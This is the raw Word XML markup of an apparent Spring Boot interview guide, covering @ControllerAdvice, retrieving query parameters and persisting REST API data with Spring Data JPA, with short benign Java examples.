    <w:p w14:paraId="2530646B" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C89237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4421F70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660E91DF" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FEF90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6BA4FD7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INTERNAL_SERVER_ERROR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C188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andleException(Exception ex, Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0666586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error", ex.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A1AF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rror";  // Return an error view</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC974B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90259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FDFA4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any exception that is thrown from the controller methods will be caught by @ExceptionHandler in @ControllerAdvice, and it will show an error page with the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47773E1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Adding Global Model Attributes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449629C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4FCDE2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287D0A52" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6001A39C"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39EE7DE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ModelAttributes {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FCAED" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF8A3B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ttribute("appName")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AC7C9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addAppName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B357F88"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pring Boot Application";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A5ED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C5678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215E7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 the attribute appName will be available in every controller method and view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1431CC7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B6F1B">
          <v:rect id="_x0000_i2589" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D5415"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enefits of @ControllerAdvice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F909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entralized Exception Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It allows handling exceptions in a single place, improving maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A6DA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eaner Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reduces the need for duplicate code to handle common logic like setting model attributes or exception handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABCC0F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Provides a way to add common data to all models used in controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643606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ControllerAdvice is a very useful feature in Spring for handling global exception handling, adding model attributes, or providing global configuration across all controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519364B" w14:textId="294B2B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590" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5BAEA" w14:textId="38C059E0" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="007C7D29">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="615" w:name="_Toc197867829"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to retrieve query parameters in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="615"/>
    </w:p>
    <w:p w14:paraId="50006CC1" w14:textId="59FB20DE"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you can retrieve query parameters from the request using various ways, such as using the @RequestParam annotation, or directly from the HttpServletRequest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B59198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RequestParam Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6436369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Param annotation is used to extract query parameters from the URL. Query parameters are passed as key-value pairs in the URL (e.g., /api/messages?user=John&amp;age=30).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8850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3739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mport org.springframework.web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2431142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questParam;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE4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2F66E9BB" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A21693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ECDA13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01ADC293" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020E3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76A7C68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 @RequestParam int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7931B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4D75F11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AF83A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85A9E9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3784046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String user retrieves the user query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA946D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int age retrieves the age query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F10AAF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5D7C54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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C07D8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449C249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John. You are 30 years old.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533B2E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questParam with Default Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B642FA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provide a default value for a query parameter if it's not present in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D84CF5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1B12325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defaultValue = "Guest") String user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2422EED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6B311B1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E87C7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 user parameter is not provided in the request, "Guest" will be used as the default value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FCF0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CAF9C9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816B003"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696B193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Guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB225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HttpServletRequest to Retrieve Query Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6961CBE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access query parameters directly from the HttpServletRequest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7EB87"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17383F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79B7AF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12C951D1" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50546A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servlet.http.HttpServletRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518AB88A" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D6661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9185A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2655A76A" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F04541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241AD4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HttpServletRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D1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 = request.getParameter("user");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF443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ge = request.getParameter("age");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A947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1929D3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A188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3F4857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we use the HttpServletRequest object to manually retrieve the query parameters user and age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1296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Handling Optional Query Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F3CE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a query parameter is optional, you can make use of @RequestParam with required = false and provide a default value if not present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7320188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3159A5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value = "user", required = false, defaultValue = "Guest") String user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57394F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4CA6394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FEFAC10"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Using @RequestParam Map to Retrieve All Query Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A8AAC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retrieve all query parameters as a map of key-value pairs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD04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4D901C9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 Map&lt;String, String&gt; queryParams) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA5E0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Query Params: " + queryParams.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298690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C0184A9"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14B28E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amp;city=NewYork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BFF4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792D21D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ery Params: {user=John, age=30, city=NewYork}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5377B687" w14:textId="77777777" w:rsidR="00DF5D7D"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10A7C1">
          <v:rect id="_x0000_i2591" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2444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1621BB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xml:space="preserve"> is the most common and cleanest way to retrieve individual query parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D50F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ervletRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used for low-level access to query parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087790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 Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows you to capture all query parameters as a map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C56358" w14:textId="3E627E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592" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67A4ED" w14:textId="664789AA" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D829D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="616" w:name="_Toc197867830"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How is the data persisted in DB with the REST </w:t>
      </w:r>
      <w:r w:rsidR="00B7714E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="616"/>
    </w:p>
    <w:p w14:paraId="5D896760" w14:textId="65DE54C6"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D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</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pring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4FB50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asic Flow for Persisting Data in the Database through a REST API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1922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Sends HTTP Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFF718"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sends an HTTP request (e.g., POST, PUT) with data (usually in the body of the request) to the REST API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A73E4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POST /api/products to create a new product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C9BC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 Receives the Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C122C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pring controller (annotated with @RestController) processes the incoming request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795FB49B"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ata (usually in JSON or XML format) sent by the client is mapped to a Java object, which is passed to the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0A4B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 Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC6EA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ervice layer performs any business logic (e.g., validations, transformations) required before persisting the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8ECD6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Ensure the product name is not empty or that the product price is valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A8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 Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DAE0AD"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layer calls a </w:t>
      </w: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often using Spring Data JPA or a custom JpaRepository implementation) to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA4841"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repository is typically an interface that extends JpaRepository or CrudRepository and provides basic CRUD (Create, Read, Update, Delete) methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2C5A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ersistence to Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C62C1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pository uses JPA to persist the entity to the database. JPA handles the mapping between the Java object (entity) and the database table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1495D7E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A Product entity is mapped to a product table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5387B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Back to the Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795743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nce the data is successfully persisted, the controller can return a response to the client, typically with a success message or the created resource, along with an HTTP status code (e.g., 201 Created).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B977AF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Simple Flow for Persisting Data in the DB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54C5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duct Entity (JPA Entity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1836DC3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0BAA0CC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edValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B92B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ionType;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0D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2FC1722F" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4633A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F37E7C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC2B466" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8F8C5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1408A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neratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0BB9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BE284B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3C0B6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price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C676775" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F8C7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73FBE55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9B6A0B"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Product Repository (Spring Data JPA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FFD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4BF247A8" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B3D20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ProductRepository extends JpaRepository&lt;Product, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CE9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E3CBB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duct Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C2D5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55350D7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6F538A44" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EC37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6B138F9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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68799536" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5E19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03FF584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Repository productRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA79AD" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4AD2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saveProduct(Product product) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347BD92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Repository.save(product);  // Saves to DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4702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53FF3E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17BF0E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roduct Controller (REST API Endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6AD6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78C74B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10A9E86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61451686" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327DF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65CAC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products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2175C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17AF6D2B" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFBCE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A285AB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Service productService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C05C7" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E6761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6C4D1F2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CREATED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B204D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970CA4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ervice.saveProduct(product);  // Persist data in DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CF0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6789E5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5E621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Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4FB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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F130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 POST request: POST /api/products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD948C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 Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C91F2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5BE0659"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Laptop",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3606479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ce": 999.99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F65696"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6478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Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
